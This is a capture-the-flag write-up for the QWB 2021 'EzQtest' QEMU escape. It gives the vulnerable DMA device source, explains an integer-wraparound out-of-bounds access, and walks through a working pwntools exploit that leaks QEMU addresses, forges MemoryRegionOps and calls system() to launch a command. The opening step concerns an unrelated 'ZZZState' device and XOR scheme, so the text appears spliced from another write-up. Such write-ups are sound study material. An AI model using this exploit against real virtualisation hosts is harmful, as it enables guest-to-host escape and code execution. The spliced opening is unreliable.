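4. Use the out-of-bounds write to overwrite cpu_physical_memory_rw with system@plt and point the opaque pointer at a new forged ZZZState whose addr is the address of the command to execute, then write the command at that address. This step has many constraints; in particular the argument address must be page-aligned. To satisfy as many of them as possible the new forged ZZZState should sit at as low an address as possible, which means the offset forged in step 1 should be as small as possible after being XORed with 0x209. This condition must also be added to the brute force in step 1.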
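The effect of the 0x209 XOR on a forged len can be sketched as follows. This only models the bit fields that ZZZ_CMD_KICK reads from len (bit 0 for direction, `len & 0x7FFE` for the byte count, the sign bit for the IRQ); `decode_len` and `after_xor` are hypothetical helper names, and the sample value is illustrative rather than the one found by the brute force.

```python
XOR_MASK = 0x0209  # constant that ZZZ_CMD_XOR applies to each 16-bit word


def decode_len(raw_len: int) -> dict:
    """Split a 16-bit len value the way ZZZ_CMD_KICK interprets it."""
    raw_len &= 0xFFFF
    return {
        # is_write argument of cpu_physical_memory_rw:
        # True copies buf to guest memory, False copies guest memory into buf
        "buf_to_guest": bool(raw_len & 1),
        "nbytes": raw_len & 0x7FFE,
        "raise_irq": raw_len >= 0x8000,  # (int16_t)len < 0
    }


def after_xor(raw_len: int) -> int:
    """Value of a 16-bit word in buf after one ZZZ_CMD_XOR pass over it."""
    return (raw_len ^ XOR_MASK) & 0xFFFF


if __name__ == "__main__":
    before = 0x0FF1  # illustrative forged len with the direction bit set
    print(decode_len(before))
    print(decode_len(after_xor(before)))
```

Since 0x209 has bit 0 set, one XOR pass always flips the transfer direction; it also flips bits 3 and 9, which is why the resulting length and offset have to be re-checked against the KICK bounds test.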
2021qwb-EzQtest
Environment setup
First enable the universe repository and refresh the package index:
sudo add-apt-repository universe -y
sudo apt-get update

sudo apt-get install -y \
    xen-hypervisor-4.11-amd64 xen-utils-4.11 \
    libxenstore3.0 libxentoolcore1 libxencall1 libxenmisc4.11 \
    libxenforeignmemory1 libxengnttab1 libxenevtchn1 libxendevicemodel1

sudo apt-get install -y \
    libsnappy1v5 libfdt1 vde2 libiscsi7 librbd1 librados2 libaio1
launch.sh then starts QEMU in qtest mode:
./qemu-system-x86_64 \
    -display none \
    -machine accel=qtest \
    -m 512M \
    -device qwb \
    -nodefaults \
    -monitor none \
    -qtest stdio
-machine accel=qtest together with -qtest stdio selects qtest mode: no guest code runs, and the qtest protocol is spoken over stdin/stdout.
Vulnerability analysis
The source of the challenge device is as follows:
#include "qemu/osdep.h"
#include "qapi/error.h"
#include "hw/pci/pci.h"
#include "hw/pci/pci_regs.h"
#include "hw/mem/pc-dimm.h"
#include "hw/qdev-properties.h"
#include "exec/memory.h"
#include "hw/irq.h"
#include "hw/qdev-clock.h"
#include "hw/qdev-core.h"
#include "qemu/typedefs.h"

#define TYPE_QWB "qwb"
OBJECT_DECLARE_SIMPLE_TYPE(QWBState, QWB)

typedef uint64_t dma_addr_t;

typedef struct dma_state {
    dma_addr_t src;
    dma_addr_t dst;
    dma_addr_t cnt;
    dma_addr_t cmd;
} dma_state;

typedef struct QWBState {
    PCIDevice pdev;
    MemoryRegion mmio;
    uint32_t dma_info_size;
    uint32_t dma_info_idx;
    uint32_t dma_using;
    uint32_t _pad;
    dma_state dma_info[32];
    uint8_t dma_buf[0x1000];
} QWBState;

static uint64_t qwb_mmio_read(void *opaque, hwaddr addr, unsigned size);
static void qwb_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size);

static const MemoryRegionOps qwb_mmio_ops = {
    .read = qwb_mmio_read,
    .write = qwb_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
    .valid = {
        .min_access_size = 4,
        .max_access_size = 8,
        .unaligned = false,
    },
    .impl = {
        .min_access_size = 4,
        .max_access_size = 8,
        .unaligned = false,
    },
};

static void qwb_do_dma(QWBState *s)
{
    size_t i;

    s->dma_using = 1;

    for (i = 0; i < s->dma_info_size; i++) {
        dma_state *d = &s->dma_info[i];
        if (d->cmd) {
            if (d->src + d->cnt > 0x1000 || d->cnt > 0x1000) {
                goto end;
            }
        } else {
            if (d->dst + d->cnt > 0x1000 || d->cnt > 0x1000) {
                goto end;
            }
        }
    }

    for (i = 0; i < s->dma_info_size; i++) {
        dma_state *d = &s->dma_info[i];
        if (d->cmd) {
            pci_dma_write(&s->pdev, d->dst, &s->dma_buf[d->src], d->cnt);
        } else {
            pci_dma_read(&s->pdev, d->src, &s->dma_buf[d->dst], d->cnt);
        }
    }

end:
    s->dma_using = 0;
}

static uint64_t qwb_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    QWBState *s = opaque;
    uint64_t v = ~0ULL;

    if (size != 8)
        return v;

    switch (addr) {
    case 0x00:
        v = s->dma_info_size;
        break;
    case 0x08:
        if (!s->dma_using)
            v = s->dma_info_idx;
        break;
    case 0x10:
        if (!s->dma_using && s->dma_info_idx <= 0x1F)
            v = s->dma_info[s->dma_info_idx].src;
        break;
    case 0x18:
        if (!s->dma_using && s->dma_info_idx <= 0x1F)
            v = s->dma_info[s->dma_info_idx].dst;
        break;
    case 0x20:
        if (!s->dma_using && s->dma_info_idx <= 0x1F)
            v = s->dma_info[s->dma_info_idx].cnt;
        break;
    case 0x28:
        if (!s->dma_using && s->dma_info_idx <= 0x1F)
            v = s->dma_info[s->dma_info_idx].cmd;
        break;
    case 0x30:
        if (!s->dma_using) {
            qwb_do_dma(s);
            v = 1;
        }
        break;
    default:
        break;
    }
    return v;
}

static void qwb_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size)
{
    QWBState *s = opaque;

    if (size != 8)
        return;

    switch (addr) {
    case 0x00:
        if (val <= 0x20)
            s->dma_info_size = val;
        break;
    case 0x08:
        if (!s->dma_using && val <= 0x1F)
            s->dma_info_idx = val;
        break;
    case 0x10:
        if (!s->dma_using && s->dma_info_idx <= 0x1F)
            s->dma_info[s->dma_info_idx].src = val;
        break;
    case 0x18:
        if (!s->dma_using && s->dma_info_idx <= 0x1F)
            s->dma_info[s->dma_info_idx].dst = val;
        break;
    case 0x20:
        if (!s->dma_using && s->dma_info_idx <= 0x1F)
            s->dma_info[s->dma_info_idx].cnt = val;
        break;
    case 0x28:
        if (!s->dma_using && s->dma_info_idx <= 0x1F)
            s->dma_info[s->dma_info_idx].cmd = (val & 1);
        break;
    default:
        break;
    }
}

static void qwb_instance_init(Object *obj)
{
    QWBState *s = QWB(obj);

    s->dma_info_size = 0;
    s->dma_info_idx = 0;
    s->dma_using = 0;
}

static void qwb_realize(PCIDevice *pdev, Error **errp)
{
    QWBState *s = QWB(pdev);

    memory_region_init_io(&s->mmio, OBJECT(pdev), &qwb_mmio_ops, s, "qwb-mmio", 0x100000);
    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &s->mmio);
}

static void qwb_uninit(PCIDevice *pdev)
{
    QWBState *s = QWB(pdev);

    s->dma_info_size = s->dma_info_idx = s->dma_using = 0;
}

static void qwb_class_init(ObjectClass *oc, void *data)
{
    DeviceClass *dc = DEVICE_CLASS(oc);
    PCIDeviceClass *k = PCI_DEVICE_CLASS(oc);

    k->realize = qwb_realize;
    k->exit = qwb_uninit;
    k->vendor_id = 0x2021;
    k->device_id = 0x0612;
    k->revision = 0x10;
    k->class_id = PCI_CLASS_OTHERS;
    set_bit(DEVICE_CATEGORY_MISC, dc->categories);
}

static const TypeInfo qwb_info = {
    .name = TYPE_QWB,
    .parent = TYPE_PCI_DEVICE,
    .instance_size = sizeof(QWBState),
    .instance_init = qwb_instance_init,
    .class_init = qwb_class_init,
};

static void qwb_register_types(void)
{
    type_register_static(&qwb_info);
}

type_init(qwb_register_types)
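This is a simplified DMA controller attached to the PCI bus that exposes a 1 MiB MMIO BAR. Internally it has a 4 KB device buffer, dma_buf, and up to 32 DMA descriptors, dma_info[32]. The descriptors are filled in through MMIO registers, and a single read of BASE+0x30 then calls qwb_do_dma() to execute the DMA.
The MMIO offsets map to the following functions: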
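| Offset | Name | Access | Semantics |
|--------|-------|--------|-----------|
| 0x00 | SIZE | R/W | Queue length (number of entries), 0..32. Writes do not check dma_using (one of the bugs). Reads return the current length. |
| 0x08 | IDX | R/W | Current entry index, 0..31. Readable and writable only when dma_using == 0; reads while busy return ~0. |
| 0x10 | SRC | R/W | Applies to the entry selected by IDX. Both reads and writes require !dma_using and IDX <= 31 (the read path implements the check with a field-packing trick). |
| 0x18 | DST | R/W | Same as above. |
| 0x20 | CNT | R/W | Same as above. |
| 0x28 | CMD | R/W | Only bit 0 is used: 0 = system→device, 1 = device→system. |
| 0x30 | START | R | Triggered by a read. If !dma_using, calls qwb_do_dma() to execute the first SIZE entries and returns 1; otherwise returns ~0. |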
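In other words, the required fields are first set through the other registers, and a read of offset 0x30 then triggers qwb_do_dma() to perform the actual transfer.
cmd == 1: pci_dma_write(&pdev, dst, &dma_buf[src], cnt);
cmd == 0: pci_dma_read (&pdev, src, &dma_buf[dst], cnt);
cmd == 0 (guest→device): copies from guest physical memory (guest RAM) into the device's internal dma_buf[dst..dst+cnt).
cmd == 1 (device→guest): copies from the device's internal dma_buf[src..src+cnt) to guest physical memory (dst).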
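The register sequence described above can be sketched as a list of qtest-style accesses. The register offsets come from the device source; `single_dma_ops` and the tuple format are illustrative assumptions, not part of the challenge or of QEMU.

```python
# MMIO register offsets of the qwb device (from qwb_mmio_read/qwb_mmio_write)
REG_SIZE, REG_IDX, REG_SRC, REG_DST, REG_CNT, REG_CMD, REG_START = (
    0x00, 0x08, 0x10, 0x18, 0x20, 0x28, 0x30)


def single_dma_ops(base: int, src: int, dst: int, cnt: int, cmd: int) -> list:
    """Return the 8-byte MMIO accesses that program descriptor 0 and start it.

    Each entry is (operation, address, value); the final readq of START is
    what makes the device call qwb_do_dma().
    """
    return [
        ("writeq", base + REG_SIZE, 1),        # one descriptor in the queue
        ("writeq", base + REG_IDX, 0),         # select descriptor 0
        ("writeq", base + REG_SRC, src),
        ("writeq", base + REG_DST, dst),
        ("writeq", base + REG_CNT, cnt),
        ("writeq", base + REG_CMD, cmd & 1),   # device keeps only bit 0
        ("readq", base + REG_START, None),     # read-triggered start
    ]


if __name__ == "__main__":
    # copy 0x100 bytes from guest RAM 0x220000 into dma_buf[0..0x100)
    for op in single_dma_ops(0xF0000000, src=0x220000, dst=0, cnt=0x100, cmd=0):
        print(op)
```

All accesses must be 8 bytes wide, because both MMIO handlers return early when size != 8.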
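The bug is in the first check loop of qwb_do_dma(), which only validates the device-side dma_buf bounds:
if (d->cmd) {
    if (d->src + d->cnt > 0x1000 || d->cnt > 0x1000) goto end;
} else {
    if (d->dst + d->cnt > 0x1000 || d->cnt > 0x1000) goto end;
}
Here d->src + d->cnt and d->dst + d->cnt are unsigned 64-bit additions in C. If cnt is kept small (<= 0x1000, to satisfy the second condition) while src or dst is close to 2^64, the sum wraps around to a small value and passes the <= 0x1000 test.
The actual DMA phase then treats &s->dma_buf[src] or &s->dma_buf[dst] as a pointer into the host process address space, which gives:
cmd == 1: out-of-bounds read of host memory (pci_dma_write(..., s->dma_buf + src, cnt) uses that pointer as the source);
cmd == 0: out-of-bounds write of host memory (pci_dma_read(..., s->dma_buf + dst, cnt) uses it as the destination).
So we can read or write starting up to 0x1000 bytes before dma_buf, with a maximum transfer length of 0x1000, and the end of the transfer must land at or inside dma_buf.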
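The wraparound can be reproduced with 64-bit modular arithmetic. The sketch below models only the check from qwb_do_dma(); `passes_check` and `oob_window` are illustrative names, and `u64_neg` matches the helper of the same name used in the exploit.

```python
MASK64 = (1 << 64) - 1
BUF_SIZE = 0x1000


def u64_neg(k: int) -> int:
    """Unsigned 64-bit representation of -k, i.e. 2**64 - k."""
    return (-k) & MASK64


def passes_check(off: int, cnt: int) -> bool:
    """Mirror `off + cnt > 0x1000 || cnt > 0x1000` with uint64_t wraparound."""
    return not (((off + cnt) & MASK64) > BUF_SIZE or cnt > BUF_SIZE)


def oob_window(neg_off: int, cnt: int):
    """Return (start, end) relative to dma_buf, or None if the check rejects it."""
    if not passes_check(u64_neg(neg_off), cnt):
        return None
    return (-neg_off, cnt - neg_off)


if __name__ == "__main__":
    print(oob_window(0x4B8, 0x600))  # accepted: the sum wraps to 0x148
    print(oob_window(0x4B8, 0x100))  # rejected: no wrap, the sum stays huge
```

The accepted windows are exactly those with neg_off <= cnt <= 0x1000, which is why the transfer always has to run up to the start of dma_buf.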
Exploitation
Consider the QWBState structure that contains dma_buf:
typedef struct QWBState {
    PCIDevice pdev;
    MemoryRegion mmio;
    uint32_t dma_info_size;
    uint32_t dma_info_idx;
    uint32_t dma_using;
    uint32_t _pad;
    dma_state dma_info[32];
    uint8_t dma_buf[0x1000];
} QWBState;
Within the out-of-bounds range before dma_buf lies mmio, a MemoryRegion structure that is initialized when qwb_realize registers the MMIO region.
static void qwb_realize(PCIDevice *pdev, Error **errp)
{
    QWBState *s = QWB(pdev);

    memory_region_init_io(&s->mmio, OBJECT(pdev), &qwb_mmio_ops, s, "qwb-mmio", 0x100000);
    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &s->mmio);
}
The MemoryRegion structure is defined as follows:
struct MemoryRegion {
    Object parent_obj;

    bool romd_mode;
    bool ram;
    bool subpage;
    bool readonly;
    bool nonvolatile;
    bool rom_device;
    bool flush_coalesced_mmio;
    bool global_locking;
    uint8_t dirty_log_mask;
    bool is_iommu;
    RAMBlock *ram_block;
    Object *owner;

    const MemoryRegionOps *ops;
    void *opaque;
    MemoryRegion *container;
    Int128 size;
    hwaddr addr;
    void (*destructor)(MemoryRegion *mr);
    uint64_t align;
    bool terminates;
    bool ram_device;
    bool enabled;
    bool warning_printed;
    uint8_t vga_logging_count;
    MemoryRegion *alias;
    hwaddr alias_offset;
    int32_t priority;
    QTAILQ_HEAD(, MemoryRegion) subregions;
    QTAILQ_ENTRY(MemoryRegion) subregions_link;
    QTAILQ_HEAD(, CoalescedMemoryRange) coalesced;
    const char *name;
    unsigned ioeventfd_nb;
    MemoryRegionIoeventfd *ioeventfds;
};
From this region we can leak the address of the QWBState object and the base address of the QEMU binary.
pwndbg> telescope 0x55b9e81feee0+0xe00-0x4b8
00:0000│ 0x55b9e81ff828 —▸ 0x55b9cbc6ed80 (qwb_mmio_ops) —▸ 0x55b9cb03ffa5 (qwb_mmio_read) ◂— endbr64
01:0008│ 0x55b9e81ff830 —▸ 0x55b9e81feee0 —▸ 0x55b9e7571790 —▸ 0x55b9e736bb00 —▸ 0x55b9e7304f00 ◂— ...
02:0010│ 0x55b9e81ff838 —▸ 0x55b9e75e6400 —▸ 0x55b9e744b4a0 —▸ 0x55b9e73aa140 —▸ 0x55b9e73aa2c0 ◂— ...
03:0018│ 0x55b9e81ff840 ◂— 0x100000
04:0020│ 0x55b9e81ff848 ◂— 0
05:0028│ 0x55b9e81ff850 ◂— 0xf0000000
06:0030│ 0x55b9e81ff858 —▸ 0x55b9cb3c5631 (memory_region_destructor_none) ◂— endbr64
07:0038│ 0x55b9e81ff860 ◂— 0
qt = QTest(["./launch.sh"])
qwb = QWB(qt, base=0xf0000000)
qemu = ELF("./qemu-system-x86_64")

# The leak starts at &mmio.ops, 0x4b8 bytes before dma_buf
leak = qwb.oob_read_before(neg_off=0x4b8, nbytes=0x600, ram_out=0x300000)
print(hexdump(leak))
QWBState_addr = u64(leak[0x8:0x8 + 8])      # mmio.opaque points at the QWBState
success("QWBState_addr: " + hex(QWBState_addr))
qemu.address = u64(leak[0x30:0x30 + 8]) - qemu.sym['memory_region_destructor_none']
success("qemu base: " + hex(qemu.address))
The read and write callbacks in MemoryRegionOps handle accesses to this MMIO region:
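The same extraction can be sketched without pwntools, using only the standard struct module. The field offsets (0x00 ops, 0x08 opaque, 0x30 destructor) are taken from the telescope output above; `parse_leak` is an illustrative helper, and the symbol offset passed to it in the example is a made-up placeholder, since the real one has to come from the ELF symbol table.

```python
import struct

# Offsets inside the leak, which starts at &mmio.ops
OPS_OFF, OPAQUE_OFF, DESTRUCTOR_OFF = 0x00, 0x08, 0x30


def parse_leak(leak: bytes, destructor_sym_off: int) -> dict:
    """Pull the interesting pointers out of the leaked MemoryRegion fields.

    destructor_sym_off is the offset of memory_region_destructor_none inside
    the QEMU binary; the caller must look it up in the ELF.
    """
    (ops,) = struct.unpack_from("<Q", leak, OPS_OFF)
    (opaque,) = struct.unpack_from("<Q", leak, OPAQUE_OFF)
    (destructor,) = struct.unpack_from("<Q", leak, DESTRUCTOR_OFF)
    return {
        "ops": ops,
        "qwb_state": opaque,
        "qemu_base": destructor - destructor_sym_off,
    }


if __name__ == "__main__":
    # Synthetic buffer built from the pointer values in the telescope output
    fake = bytearray(0x38)
    struct.pack_into("<Q", fake, OPS_OFF, 0x55B9CBC6ED80)
    struct.pack_into("<Q", fake, OPAQUE_OFF, 0x55B9E81FEEE0)
    struct.pack_into("<Q", fake, DESTRUCTOR_OFF, 0x55B9CB3C5631)
    # 0x3C5631 is a hypothetical symbol offset used only for illustration
    info = parse_leak(bytes(fake), destructor_sym_off=0x3C5631)
    print({k: hex(v) for k, v in info.items()})
```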
pwndbg> p qwb_mmio_ops
$2 = {
read = 0x55b9cb03ffa5 <qwb_mmio_read >,
write = 0x55b9cb0401bd <qwb_mmio_write >,
read_with_attrs = 0x0 ,
write_with_attrs = 0x0 ,
endianness = DEVICE_NATIVE_ENDIAN,
valid = {
min_access_size = 4,
max_access_size = 8,
unaligned = false,
accepts = 0x0
},
impl = {
min_access_size = 4,
max_access_size = 8,
unaligned = false
}
}
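We can redirect this ops pointer to memory we control and forge a MemoryRegionOps structure there, which hijacks control flow:
leak = bytearray(leak)
leak[0:8] = p64(QWBState_addr + 0xE00)    # mmio.ops -> dma_buf

# Fake MemoryRegionOps placed at the start of dma_buf
qwb_mmio_ops = flat(
    p64(0xdeadbeef),    # read
    p64(0xdeadbeef),    # write
    p64(0),             # read_with_attrs
    p64(0),             # write_with_attrs

    p32(0),             # endianness
    p32(0),             # padding

    p32(4),             # valid.min_access_size
    p32(8),             # valid.max_access_size
    p32(0),             # valid.unaligned
    p32(0),             # padding
    p64(0),             # valid.accepts

    p32(4),             # impl.min_access_size
    p32(8),             # impl.max_access_size
    p32(0),             # impl.unaligned
    p32(0),             # padding
)

leak[0x4b8:0x4b8 + len(qwb_mmio_ops)] = qwb_mmio_ops
leak[0x8:0x8 + 8] = b"B" * 8              # mmio.opaque, passed as the first argument

leak = bytes(leak)

qwb.oob_write_before(neg_off=0x4b8, payload=leak)
pause()
# Any further MMIO access now goes through the fake ops
qwb.oob_write_before(neg_off=0x4b0, payload=leak)
The next access to this MMIO region hijacks control flow, with the rax and rdi registers under our control.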
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────────────────────────
* RAX 0x4242424242424242 ('BBBBBBBB')
RBX 0x55b7228da8c0 ◂— 1
RCX 8
RDX 1
* RDI 0x4242424242424242 ('BBBBBBBB')
RSI 0
* R8 0xdeadbeef
R9 0xffffffffffffffff
R10 0x55b6fe0c0109 (memory_region_write_accessor) ◂— endbr64
R11 0x7f0ed00dc3c0 ◂— 0x2000200020002
R12 0x55b721e13110 ◂— 0x55b700000002
R13 0x55b6fe1e3238 (qio_channel_fd_source_dispatch) ◂— endbr64
R14 0x7f0ed102f280 —▸ 0x7f0ed0f54e80 ◂— endbr64
R15 0x55b7228da9b0 —▸ 0x55b721e13110 ◂— 0x55b700000002
RBP 0x7ffe36ce3120 —▸ 0x7ffe36ce31a0 —▸ 0x7ffe36ce31f0 —▸ 0x7ffe36ce3250 —▸ 0x7ffe36ce32d0 ◂— ...
RSP 0x7ffe36ce30d8 —▸ 0x55b6fe0c01f6 (memory_region_write_accessor+237) ◂— mov eax , 0
* RIP 0xdeadbeef
────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────────────────────────
Invalid address 0xdeadbeef
──────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffe36ce30d8 —▸ 0x55b6fe0c01f6 (memory_region_write_accessor+237) ◂— mov eax , 0
01:0008│-040 0x7ffe36ce30e0 —▸ 0x55b7219bc080 ◂— 0x302e37312b20525b ('[R +17.0')
02:0010│-038 0x7ffe36ce30e8 ◂— 0xffffffffffffffff
03:0018│-030 0x7ffe36ce30f0 ◂— 0x800000000
04:0020│-028 0x7ffe36ce30f8 —▸ 0x7ffe36ce31c8 ◂— 1
05:0028│-020 0x7ffe36ce3100 ◂— 0
06:0030│-018 0x7ffe36ce3108 —▸ 0x55b7227f47e0 —▸ 0x55b721a404a0 —▸ 0x55b72199f140 —▸ 0x55b72199f2c0 ◂— ...
07:0038│-010 0x7ffe36ce3110 ◂— 1
────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────
► 0 0xdeadbeef
1 0x55b6fe0c01f6 memory_region_write_accessor+237
2 0x55b6fe0c042d access_with_adjusted_size+317
3 0x55b6fe0c34dc memory_region_dispatch_write+269
4 0x55b6fe153163 flatview_write_continue+197
5 0x55b6fe1532ac flatview_write+140
6 0x55b6fe153626 address_space_write+115
7 0x55b6fe061fd4 qtest_process_command+3455
────────────────────────────────────────────────────────[ THREADS (3 TOTAL) ]────────────────────────────────────────────────────────
► 1 "qemu-system-x86 " stopped : 0xdeadbeef
2 "qemu-system-x86 " stopped : 0x7f0ed005889d <syscall+29 >
3 "qemu-system-x86 " stopped : 0x7f0ecff84322 <sigtimedwait+162 >
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>
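The fake MemoryRegionOps used above can also be laid out with the standard struct module, which makes the padding explicit. This is a sketch that assumes the x86-64 layout implied by the gdb dump of qwb_mmio_ops (four callbacks, endianness, then the valid and impl sub-structures); `fake_ops` is an illustrative helper name.

```python
import struct

# read, write, read_with_attrs, write_with_attrs | endianness + pad |
# valid {min, max, unaligned + pad, pad, accepts} | impl {min, max, unaligned + pad} + tail pad
OPS_FMT = "<4Q I4x II?3x4xQ II?3x4x"


def fake_ops(read_fn: int, write_fn: int) -> bytes:
    """Build an 80-byte MemoryRegionOps image with the given callbacks."""
    return struct.pack(
        OPS_FMT,
        read_fn, write_fn, 0, 0,  # callbacks; the *_with_attrs variants stay NULL
        0,                        # endianness value 0, as in the payload above
        4, 8, False, 0,           # valid: min, max, unaligned, accepts
        4, 8, False,              # impl: min, max, unaligned
    )


if __name__ == "__main__":
    blob = fake_ops(0xDEADBEEF, 0xDEADBEEF)
    print(len(blob), blob.hex())
```

Keeping the access-size limits at 4 and 8 matters: the qtest writeq that triggers the hijack is an 8-byte access, and it must still be accepted by the valid range before the write callback is invoked.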
From here there are many ways to finish the exploit, for example pointing rdi at the command to run and jumping to system@plt.
leak = bytearray(leak)
leak[0:8] = p64(QWBState_addr + 0xe00)    # mmio.ops -> dma_buf

qwb_mmio_ops = flat(
    p64(qemu.plt['system']),    # read
    p64(qemu.plt['system']),    # write
    p64(0),                     # read_with_attrs
    p64(0),                     # write_with_attrs

    p32(0),                     # endianness
    p32(0),                     # padding

    p32(4),                     # valid.min_access_size
    p32(8),                     # valid.max_access_size
    p32(0),                     # valid.unaligned
    p32(0),                     # padding
    p64(0),                     # valid.accepts

    p32(4),                     # impl.min_access_size
    p32(8),                     # impl.max_access_size
    p32(0),                     # impl.unaligned
    p32(0),                     # padding
)

cmd = "/usr/bin/gnome-calculator"

# Fake ops at dma_buf, command string right after it
leak[0x4b8:0x4b8 + len(qwb_mmio_ops)] = qwb_mmio_ops
leak[0x4b8 + len(qwb_mmio_ops):0x4b8 + len(qwb_mmio_ops) + len(cmd)] = cmd.encode()
# mmio.opaque (first argument, rdi) -> command string
leak[0x8:0x8 + 8] = p64(QWBState_addr + 0xe00 + len(qwb_mmio_ops))

leak = bytes(leak)

qwb.oob_write_before(neg_off=0x4b8, payload=leak)
pause()
qwb.oob_write_before(neg_off=0x4b8, payload=leak)
Alternatively, a stack-pivot gadget can be used to run a ROP chain, which in turn can load and execute arbitrary shellcode.
0x00000000004dc19c : push rax ; pop rsp ; ret
Full exploit
def pci_cfg_readl(self, bus, dev, fn, off):
    cfg = 0x80000000 | (bus << 16) | (dev << 11) | (fn << 8) | (off & 0xfc)
    self.outl(0xcf8, cfg)
    return self.inl(0xcfc)
Conclusion: only after BAR0 has been programmed with a valid physical address and (usually) COMMAND bit 1 (MEM) has been set will a readq/writeq to BASE+offset actually reach the device's qwb_mmio_read/qwb_mmio_write.
On the PC (i440FX) platform the PCI MMIO window usually sits around 3.5G-4G (for example, starting at 0xE0000000). The challenge runs with only -m 512M, so placing BAR0 at 0xF0000000 keeps it far from RAM and avoids any conflict.
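The configuration-space access used here follows the legacy 0xCF8/0xCFC port mechanism. As a minimal sketch, the address encoding and the COMMAND update can be written as pure functions; `pci_cfg_addr` and `enable_mem_busmaster` are illustrative names that mirror pci_cfg_readl and enable_cmd_mem_busmaster in the exploit.

```python
def pci_cfg_addr(bus: int, dev: int, fn: int, off: int) -> int:
    """Value written to port 0xCF8 to select a config-space dword."""
    return 0x80000000 | (bus << 16) | (dev << 11) | (fn << 8) | (off & 0xFC)


def enable_mem_busmaster(cmd_status: int) -> int:
    """Set COMMAND bit 1 (memory space) and bit 2 (bus master).

    cmd_status is the dword read from config offset 0x04: COMMAND is the low
    16 bits, STATUS the high 16 bits, which are left untouched.
    """
    cmd = (cmd_status & 0xFFFF) | 0x0006
    return (cmd_status & ~0xFFFF) | cmd


if __name__ == "__main__":
    # BAR0 lives at config offset 0x10; device 3 on bus 0 is only an example
    print(hex(pci_cfg_addr(0, 3, 0, 0x10)))
    print(hex(enable_mem_busmaster(0x02000000)))
```

Bit 2 is set as well because the device performs its transfers with pci_dma_read/pci_dma_write, which go through the device's bus-master address space.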
from pwn import *
import re, os, time, struct

context.log_level = 'debug' if os.getenv('DEBUG') else 'info'

HEX = re.compile(r'0x[0-9a-fA-F]+')


class QTest:
    def __init__(self, argv=["./launch.sh"], tmo=5.0):
        self.p = process(argv, shell=False)
        self.tmo = float(os.getenv('QTEST_TMO', tmo))
        self._drain_banner()

    @staticmethod
    def _strip_prefix(line: bytes) -> str:
        s = line.decode('utf-8', 'ignore').rstrip('\r\n')
        if s.startswith('['):
            rb = s.find(']')
            if rb != -1:
                s = s[rb + 1:].lstrip()
        return s

    def _drain_banner(self):
        self.p.timeout = 0.1
        try:
            while True:
                if not self.p.recvline(timeout=0.1):
                    break
        except EOFError:
            pass
        finally:
            self.p.timeout = None

    def _flush_before_send(self):
        self.p.timeout = 0.01
        try:
            while True:
                l = self.p.recvline(timeout=0.01)
                if not l:
                    break
        except EOFError:
            pass
        finally:
            self.p.timeout = None

    def _send(self, s: str):
        self._flush_before_send()
        self.p.sendline(s.encode())

    def _read_resp(self, need_val=False):
        """
        Read until OK appears; accepts both 'OK 0x...' and '0x...\\nOK'.
        Returns the last hexadecimal number seen (need_val=True) or None.
        """
        val = None
        deadline = time.time() + self.tmo
        while True:
            if time.time() > deadline:
                raise RuntimeError("No reply from qtest")
            l = self.p.recvline()
            if not l:
                continue
            s = self._strip_prefix(l)
            if not s:
                continue
            if 'FAIL' in s:
                raise RuntimeError(s)
            if need_val:
                ms = HEX.findall(s)
                if ms:
                    val = int(ms[-1], 16)
            if s == 'OK' or s.startswith('OK'):
                self._flush_before_send()
                return val

    def writeq(self, addr, val):
        self._send(f"writeq {addr:#x} {val:#x}")
        self._read_resp(False)

    def readq(self, addr):
        self._send(f"readq {addr:#x}")
        return self._read_resp(True)

    def outl(self, port, val):
        self._send(f"outl {port:#x} {val:#x}")
        self._read_resp(False)

    def inl(self, port):
        self._send(f"inl {port:#x}")
        return self._read_resp(True)

    def mem_write(self, addr, data: bytes):
        for i in range(0, len(data), 8):
            chunk = data[i:i + 8]
            if len(chunk) < 8:
                chunk += b'\x00' * (8 - len(chunk))
            self.writeq(addr + i, struct.unpack('<Q', chunk)[0])

    def mem_write_qword(self, addr, qword):
        self.writeq(addr, qword)

    def mem_read(self, addr, size):
        out = bytearray()
        for i in range(0, size, 8):
            out += struct.pack('<Q', self.readq(addr + i))
        return bytes(out[:size])

    def pci_cfg_readl(self, bus, dev, fn, off):
        cfg = 0x80000000 | (bus << 16) | (dev << 11) | (fn << 8) | (off & 0xfc)
        self.outl(0xcf8, cfg)
        return self.inl(0xcfc)

    def pci_cfg_writel(self, bus, dev, fn, off, val):
        cfg = 0x80000000 | (bus << 16) | (dev << 11) | (fn << 8) | (off & 0xfc)
        self.outl(0xcf8, cfg)
        self.outl(0xcfc, val)

    def find_qwb(self, ven=0x2021, dev_id=0x0612):
        for d in range(32):
            for f in range(8):
                vdid = self.pci_cfg_readl(0, d, f, 0x00)
                if vdid == ((dev_id << 16) | ven):
                    return (0, d, f)
        raise RuntimeError("qwb device not found on PCI 00:*.*")

    def get_bar0(self, bus, dev, fn):
        return self.pci_cfg_readl(bus, dev, fn, 0x10) & ~0xF

    def set_bar0(self, bus, dev, fn, base):
        self.pci_cfg_writel(bus, dev, fn, 0x10, base)

    def enable_cmd_mem_busmaster(self, bus, dev, fn):
        v = self.pci_cfg_readl(bus, dev, fn, 0x04)
        cmd = (v & 0xFFFF) | 0x0006
        v = (v & ~0xFFFF) | cmd
        self.pci_cfg_writel(bus, dev, fn, 0x04, v)


def u64_neg(off):
    """Turn a positive offset k into 2^64 - k (the unsigned representation of -k)."""
    return ((1 << 64) - (off & ((1 << 64) - 1))) & ((1 << 64) - 1)


class QWB:
    def __init__(self, qt: QTest, base=None):
        self.qt = qt
        bus, dev, fn = qt.find_qwb()
        log.info(f"Found qwb at 00:{dev:02x}.{fn}")

        bar0 = qt.get_bar0(bus, dev, fn)
        if bar0 == 0:
            map_base = int(os.getenv("MAP_BASE", "0xf0000000"), 16)
            log.warning(f"BAR0=0, programming BAR0 -> {map_base:#x}")
            qt.set_bar0(bus, dev, fn, map_base)
